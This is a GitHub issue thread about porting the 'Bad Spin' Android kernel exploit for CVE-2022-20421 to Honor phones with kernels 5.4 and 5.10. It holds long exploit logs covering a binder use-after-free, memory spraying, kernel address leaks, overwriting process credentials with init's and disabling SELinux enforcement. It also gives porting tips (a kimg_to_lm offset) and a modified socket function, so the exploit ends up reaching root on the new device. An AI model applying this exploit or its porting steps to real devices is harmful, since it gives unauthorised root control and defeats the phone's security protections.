Failed to adapt the exploit in a new device
Securee opened this issue · 13 comments
I want to adapt the exploit and support a new device( not Samsung or Google pixel),
.android_version = 12,
.android_security_patch.year = 2022,
.android_security_patch.month = 3,
.kernel_version = KERNEL_VERSION(5, 4, 134),
.kimg_to_lm = pixel_kimg_to_lm,
.find_kbase = noop_kbase,
The uname -a is:
Linux localhost 5.4.134-qgki-g27c154db7d6e #1 SMP PREEMPT Fri Mar 25 11:44:48 CST 2022 aarch64
I have tried many times, but it failed with the following output and then the phone panic:
Bad Spin Exploit (CVE-2022-20421) by 0xkol
[x] Looking for binder_proc's inner_lock offset
[x] Trigger vulnerability... (mode = 1)
[8265:8265] New binder client: A
[8266:8266] New binder client: B
[8267:8267] New binder client: C
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
Testing ptmx 0 (fd 4)
Reading ptmx 0
Testing ptmx 1 (fd 5)
Reading ptmx 1
Freeing ptmx...
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
Joining blocker threads...
All blocker threads joined.
offsetof(inner_lock, binder_proc) = 576
[x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)
[graveyard_process] pid = 8320
[pipe_process:8321] Pinned to CPU 0
[pipe_process:8323] Pinned to CPU 2
[pipe_process:8324] Pinned to CPU 3
[pipe_process:8322] Pinned to CPU 1
[pipe_process:8325] Pinned to CPU 4
[pipe_process:8326] Pinned to CPU 5
[pipe_process:8327] Pinned to CPU 6
[pipe_process:8328] Pinned to CPU 7
[fd_master_process] pid = 8329
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:8383] 30000 files sprayed
[shaper_process:8385] 30000 files sprayed
[shaper_process:8384] 30000 files sprayed
[shaper_process:8382] 30000 files sprayed
[shaper_process:8381] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=8386
[timer_master_process] Wait for C to enter spin_lock()
[8387:8387] New binder client: A
[8389:8389] New binder client: C
[8388:8388] New binder client: B
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[timer_master_process] Done.
.....................................!............
[x] Failed.
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Reset pipe processes
Cleanup shapers
Done.
Cleanup spawner
Cleanup done.
[fd_master_process] pid = 8417
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:8473] 30000 files sprayed
[shaper_process:8469] 30000 files sprayed
[shaper_process:8470] 30000 files sprayed
[shaper_process:8472] 30000 files sprayed
[shaper_process:8471] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=8474
[timer_master_process] Wait for C to enter spin_lock()
[8476:8476] New binder client: B
[8480:8480] New binder client: C
[8475:8475] New binder client: A
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
A: 1 references accepted
B: Searching for magic badcab1ebadcab1e....
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[timer_master_process] Done.
.................................*................
The panic info is:
mReason: PANIC
sReason:page_request
info: PC filp_close+0x28/0xbc
And I have tried to change NR_EPFDS from 500 to 200, but it failed the same error.
BTW, it seem to crash randomly.
If I use another kernel 5.10.66 in the same device, it will give me the following errror:
Bad Spin Exploit (CVE-2022-20421) by 0xkol
[x] Looking for binder_proc's inner_lock offset
[x] Trigger vulnerability... (mode = 1)
[6951:6951] New binder client: A
[6952:6952] New binder client: B
[6953:6953] New binder client: C
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
A: 1 references accepted
A: Sending 1 strong handles to B
B: Searching for magic badcab1ebadcab1e....
Txn size: 1023.562500KB
B: Destroying
C: Wait for A...
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
Testing ptmx 0 (fd 4)
Reading ptmx 0
Freeing ptmx...
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
Joining blocker threads...
All blocker threads joined.
offsetof(inner_lock, binder_proc) = 576
[x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)
[graveyard_process] pid = 7358
[pipe_process:7359] Pinned to CPU 0
[pipe_process:7361] Pinned to CPU 2
[pipe_process:7364] Pinned to CPU 5
[pipe_process:7365] Pinned to CPU 6
[pipe_process:7363] Pinned to CPU 4
[pipe_process:7362] Pinned to CPU 3
[pipe_process:7360] Pinned to CPU 1
[pipe_process:7366] Pinned to CPU 7
[fd_master_process] pid = 7367
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:7441] 30000 files sprayed
[shaper_process:7439] 30000 files sprayed
[shaper_process:7440] 30000 files sprayed
[shaper_process:7438] 30000 files sprayed
[shaper_process:7437] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=7463
[timer_master_process] Wait for C to enter spin_lock()
[7466:7466] New binder client: C
[7465:7465] New binder client: B
[7464:7464] New binder client: A
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
B: Finish.
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
[timer_master_process] Done.
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
...............*..................................
[x] Success.
[x] send_dup_done done.
[x] usleep 25s done.
[x] write ipe_sockets done.
[fd_master_process] Received 512 pipes
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Cleanup shapers
shaper process pid = 7437
shaper process pid = 7438
shaper process pid = 7439
shaper process pid = 7440
shaper process pid = 7441
Done.
Cleanup spawner
Cleanup done.
[x] Trying to escalate...
Write page to every pipe
Identifying pipe
Error: failed to find corrupted pipe
[fd_master_process] pid = 7528
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:7581] 30000 files sprayed
[shaper_process:7583] 30000 files sprayed
[shaper_process:7584] 30000 files sprayed
[shaper_process:7580] 30000 files sprayed
[shaper_process:7582] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=7596
[timer_master_process] Wait for C to enter spin_lock()
[7597:7597] New binder client: A
[7607:7607] New binder client: C
[7599:7599] New binder client: B
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
monitor_thread_a: Waiting for death notification
B: Destroying
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
B: Finish.
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
(crash)
It seems to fail to find corrupted pipe.
Not sure why it fails to find the corrupted pipe.
The first log seems similar to this issue
#1
Which device is it?
Not sure why it fails to find the corrupted pipe. The first log seems similar to this issue #1
Which device is it?
The first log is Honor Magic3 with kernel 5.4 and the second log is Magic4 with kernel 5.10.66. I know I may need make some chage for kimg_to_lm and find_kbase, but it doesn't seem to have gotten that far yet.
And by print the log,the ret =0x00001000 while read pipe tmp_pipe[0] with FIONREAD in the code:
SYSCHK(ioctl(tmp_pipe[0], FIONREAD, &ret));
Unfortunately, due to my current commitments and the unavailability of an appropriate Android device for testing, I won't be able to assist you with this particular problem.
I hope you're able to resolve the issue independently, and if you have any questions related to the project in the future, please don't hesitate to ask. Thank you for your understanding.
Unfortunately, due to my current commitments and the unavailability of an appropriate Android device for testing, I won't be able to assist you with this particular problem.
I hope you're able to resolve the issue independently, and if you have any questions related to the project in the future, please don't hesitate to ask. Thank you for your understanding.
Thank you anyway, I will try to resolve the issue myself firstly.
@0xkol , now that I can read the pipe correctly.
Bad Spin Exploit (CVE-2022-20421) by 0xkol
[x] Looking for binder_proc's inner_lock offset
[x] Trigger vulnerability... (mode = 1)
[8833:8833] New binder client: A
[8835:8835] New binder client: C
[8834:8834] New binder client: B
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
B: Searching for magic badcab1ebadcab1e....
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
Testing ptmx 0 (fd 5)
Reading ptmx 0
Testing ptmx 1 (fd 6)
Reading ptmx 1
Freeing ptmx...
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
Joining blocker threads...
All blocker threads joined.
offsetof(inner_lock, binder_proc) = 576
[x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)
[graveyard_process] pid = 8890
[pipe_process:8891] Pinned to CPU 0
[pipe_process:8892] Pinned to CPU 1
[pipe_process:8893] Pinned to CPU 2
[pipe_process:8894] Pinned to CPU 3
[pipe_process:8897] Pinned to CPU 6
[pipe_process:8895] Pinned to CPU 4
[pipe_process:8896] Pinned to CPU 5
[pipe_process:8898] Pinned to CPU 7
[fd_master_process] pid = 8899
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:8952] 30000 files sprayed
[shaper_process:8951] 30000 files sprayed
[shaper_process:8953] 30000 files sprayed
[shaper_process:8954] 30000 files sprayed
[shaper_process:8955] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=8957
[timer_master_process] Wait for C to enter spin_lock()
[8960:8960] New binder client: C
[8959:8959] New binder client: B
[8958:8958] New binder client: A
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
[timer_master_process] Done.
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
...............*..................................
[fd_master_process] Received 512 pipes
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Cleanup shapers
Done.
Cleanup spawner
Cleanup done.
[x] Trying to escalate...
Write page to every pipe
Identifying pipe
[identify_pipe] Found corrupted pipe! ret = 414143c4
Closing unneeded ptmxs
Closing unneeded pipes
[x] Found corrupted ptmx and pipe.
[fd_master_process] Done.
[x] Leaking pipe buffer...
[leak_pipe_buffer] Write to the pipe
[leaker_thread] Wrote 1024 bytes to ptmx
[leak_pipe_buffer] Try read 1024 bytes from ptmx
[x] Leaked pipe buffer oprerations: ffffffebc953c768
[x] Leaked pipe buffer page : ffffffff1fd16780
[+]Begin to find_kallsyms.
[__pipe_kread] kaddr = ffffff8000000000 page = fffffffeffe00000 size = 00001000
[__pipe_kread] Try to read pipe after write_fake_pipe_buffer
(crash)
I reboot the device repeatedly, and the
a8000000-aa6affff : Kernel code
aa9b0000-aacbffff : Kernel data
from cat /proc/iomem
is the same.
So I think there is no physical kASLR in my device.Right?
If yes, so the kimg_to_lm I used by pixel_kimg_to_lm is correct. Then the rest is find_kbase function I may need to modify. But how can I judge whethor I need to modify it or not ?
By debug log, it seem to crash when:
find_kallsyms -->rw->kread --> pipe_kread-->__pipe_kread with kaddr = ffffff8000000000 page = fffffffeffe00000.
PAGE_OFFSET=0xffffff8000000000UL,and VMEMMAP_START=0xfffffffeffe00000UL.
Maybe you should add the offset 0x28000000
@0xkol You are right. after I add the 0x28000000 to kimg_to_lm, It seem to go ahead:
Bad Spin Exploit (CVE-2022-20421) by 0xkol
[x] Looking for binder_proc's inner_lock offset
[x] Trigger vulnerability... (mode = 1)
[7533:7533] New binder client: A
[7535:7535] New binder client: C
[7534:7534] New binder client: B
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
B: Searching for magic badcab1ebadcab1e....
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
Testing ptmx 0 (fd 4)
Reading ptmx 0
Freeing ptmx...
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
Joining blocker threads...
All blocker threads joined.
offsetof(inner_lock, binder_proc) = 576
[x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)
[graveyard_process] pid = 7999
[pipe_process:8000] Pinned to CPU 0
[pipe_process:8002] Pinned to CPU 2
[pipe_process:8003] Pinned to CPU 3
[pipe_process:8004] Pinned to CPU 4
[pipe_process:8001] Pinned to CPU 1
[pipe_process:8006] Pinned to CPU 6
[pipe_process:8005] Pinned to CPU 5
[pipe_process:8007] Pinned to CPU 7
[fd_master_process] pid = 8008
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:8083] 30000 files sprayed
[shaper_process:8082] 30000 files sprayed
[shaper_process:8075] 30000 files sprayed
[shaper_process:8074] 30000 files sprayed
[shaper_process:8080] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=8112
[timer_master_process] Wait for C to enter spin_lock()
[8113:8113] New binder client: A
[8114:8114] New binder client: B
[8115:8115] New binder client: C
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
A: 1 references accepted
A: Sending 1 strong handles to B
B: Searching for magic badcab1ebadcab1e....
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[timer_master_process] Done.
..................................*...............
[fd_master_process] Received 512 pipes
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Cleanup shapers
Done.
Cleanup spawner
Cleanup done.
[x] Trying to escalate...
Write page to every pipe
Identifying pipe
[identify_pipe] Found corrupted pipe! ret = 414144f5
Closing unneeded ptmxs
Closing unneeded pipes
[x] Found corrupted ptmx and pipe.
[fd_master_process] Done.
[x] Leaking pipe buffer...
[leak_pipe_buffer] Write to the pipe
[leaker_thread] Wrote 1024 bytes to ptmx
[leak_pipe_buffer] Try read 1024 bytes from ptmx
[x] Leaked pipe buffer oprerations: ffffffd98753c768
[x] Leaked pipe buffer page : ffffffff2042fc80
kallsyms_token_table file offset 0x2213b20
kallsyms_token_index file offset 0x2213ed0
kallsyms_markers file offset 0x22132b0
kallsyms_num_syms (approx) 0x21b00
kallsyms_num_syms (exact) 0x21a4d
kallsyms_relative_base 0xffffffd985200000
kallsyms_names file offset 0x20313b8
kallsyms_offsets file offset 0x1faaa70
[x] kallsyms found successfully!
[x] Kernel base: ffffffd985200000
[x] Found init_task: ffffffd987bcbe40
[x] task_struct offsets:
tasks at 1224
pid at 1480
tgid at 1484
thread_group at 1656
files at 1984
cred at 1920
[x] files_struct offsets:
fdt at 32
[x] task_struct: ffffff882959b780
[pipe_close] Found task struct: ffffff802316dc80
file->private_data offset: 216
Candidate write_buf offset: 752 (ffffff8023050000)
Switched to UAO-based read/write primitive
[x] Successfully upgraded to stable RW primitives. \o/
Fixup zombie processes
Fixup pid = 7999
Found files struct: ffffff87a320bc80
Now killing pid 7999
[x] Success! Time to root
Finding init cred
init task_struct = ffffff878041a500
init cred = ffffff87a023f180 (usage 3)
Switch 8545:-1 to new creds (ffffff87a023f180)
task_struct (8545:-1) = ffffff882959ca00 cred = ffffff879e8da600
Change cred and real_cred
Done
Setting selinux_state->enforce to 0
status page = ffffffff1ead5e00
status page virt = ffffff87b3578000
Done
Switch 7529:7529 to new creds (ffffff87a023f180)
task_struct (7529:7529) = ffffff802316dc80 cred = ffffff8791576600
Change cred and real_cred
Done
[x] Reading live selinux policy
[x] New selinux policy loaded
Switch 7529:7529 to new creds (ffffff8791576600)
task_struct (7529:7529) = ffffff802316dc80 cred = ffffff87a023f180
Change cred and real_cred
Done
Setting selinux_state->enforce to 1
status page = ffffffff1ead5e00
status page virt = ffffff87b3578000
Done
Switch 7529:7529 to new creds (ffffff87a023f180)
task_struct (7529:7529) = ffffff802316dc80 cred = ffffff8791576600
Change cred and real_cred
Done
escalate exit status = 0
Reset process state
Could not open socket connection
(the call of socket seem to fail with errno=11, try again. by netstat -ltw, can't find listening port 1337,so the connect failed.)
It seems that we are only one step away from final success.
Finally,I resolved the socket's problem by modify the connect_to function:
int connect_to(const char *ip, int port)
{
int sockfd;
sockfd = socket(PF_INET, SOCK_STREAM, 0);
struct sockaddr_in addr,cliAddr;
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons((uint16_t)port);
addr.sin_addr.s_addr = INADDR_ANY;
bind(sockfd, (struct sockaddr*)&addr, sizeof(addr));
LOG("[%s] waiting to connect to the socket......\n", __func__);
listen(sockfd,5);
int len = sizeof(cliAddr);
int clientfd = accept(sockfd, (struct sockaddr *) &cliAddr, &len);
LOG("[%s] client connect to the socket\n", __func__);
return clientfd;
}
@0xkol , now that I can read the pipe correctly.
Bad Spin Exploit (CVE-2022-20421) by 0xkol
[x] Looking for binder_proc's inner_lock offset [x] Trigger vulnerability... (mode = 1) [8833:8833] New binder client: A [8835:8835] New binder client: C [8834:8834] New binder client: B A: lookup B => handle = 2 C: lookup A => handle = 2 A: Waiting for strong nodes... A: 1 references accepted A: Sending 1 strong handles to B C: Wait for A... B: Searching for magic badcab1ebadcab1e.... Txn size: 1023.562500KB B: Destroying B: Finish. monitor_thread_a: Waiting for death notification monitor_thread_a: Found dead binder (cookie = 0x5858585858585858) monitor_thread_a: Done A: Done sending transaction. BR_FAILED_REPLY poc_a_wait_for_c_death: Waiting for C death notification [x] Trigger use-after-free Testing ptmx 0 (fd 5) Reading ptmx 0 Testing ptmx 1 (fd 6) Reading ptmx 1 Freeing ptmx... poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161) [x] Finish spinning at spin_lock() Joining blocker threads... All blocker threads joined. offsetof(inner_lock, binder_proc) = 576 [x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)
[graveyard_process] pid = 8890 [pipe_process:8891] Pinned to CPU 0 [pipe_process:8892] Pinned to CPU 1 [pipe_process:8893] Pinned to CPU 2 [pipe_process:8894] Pinned to CPU 3 [pipe_process:8897] Pinned to CPU 6 [pipe_process:8895] Pinned to CPU 4 [pipe_process:8896] Pinned to CPU 5 [pipe_process:8898] Pinned to CPU 7 [fd_master_process] pid = 8899 [fd_master_process] Creating dup process spawner [fd_master_process] Creating 50 dup processes [fd_master_process] Setup 8 pipe processes [x] Shaping physical memory [fd_master_process] Creating 5 shapers [fd_master_process] Waiting for shapers... [shaper_process:8952] 30000 files sprayed [shaper_process:8951] 30000 files sprayed [shaper_process:8953] 30000 files sprayed [shaper_process:8954] 30000 files sprayed [shaper_process:8955] 30000 files sprayed [fd_master_process] Shapers done. [fd_master_process] Wait for all dup processes to finish [x] Trigger vulnerability... (mode = 3) [timer_master_process] pid=8957 [timer_master_process] Wait for C to enter spin_lock() [8960:8960] New binder client: C [8959:8959] New binder client: B [8958:8958] New binder client: A C: lookup A => handle = 2 A: lookup B => handle = 2 A: Waiting for strong nodes... B: Searching for magic badcab1ebadcab1e.... A: 1 references accepted A: Sending 1 strong handles to B C: Wait for A... Txn size: 1023.562500KB B: Destroying B: Finish. monitor_thread_a: Waiting for death notification monitor_thread_a: Found dead binder (cookie = 0x5858585858585858) monitor_thread_a: Done A: Done sending transaction. BR_FAILED_REPLY poc_a_wait_for_c_death: Waiting for C death notification [x] Trigger use-after-free [x] Waiting for timer threads [timer_master_process] Done. poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161) [x] Finish spinning at spin_lock() ...............*.................................. [fd_master_process] Received 512 pipes [cleanup_fd_master] Cleanup zombie processes Cleanup dup processes Done. Cleanup shapers Done. Cleanup spawner Cleanup done. [x] Trying to escalate... Write page to every pipe Identifying pipe [identify_pipe] Found corrupted pipe! ret = 414143c4 Closing unneeded ptmxs Closing unneeded pipes [x] Found corrupted ptmx and pipe. [fd_master_process] Done. [x] Leaking pipe buffer... [leak_pipe_buffer] Write to the pipe [leaker_thread] Wrote 1024 bytes to ptmx [leak_pipe_buffer] Try read 1024 bytes from ptmx [x] Leaked pipe buffer oprerations: ffffffebc953c768 [x] Leaked pipe buffer page : ffffffff1fd16780 [+]Begin to find_kallsyms. [__pipe_kread] kaddr = ffffff8000000000 page = fffffffeffe00000 size = 00001000 [__pipe_kread] Try to read pipe after write_fake_pipe_buffer (crash)
@Securee could you tell me what steps were necessary to get the the pipe to be read?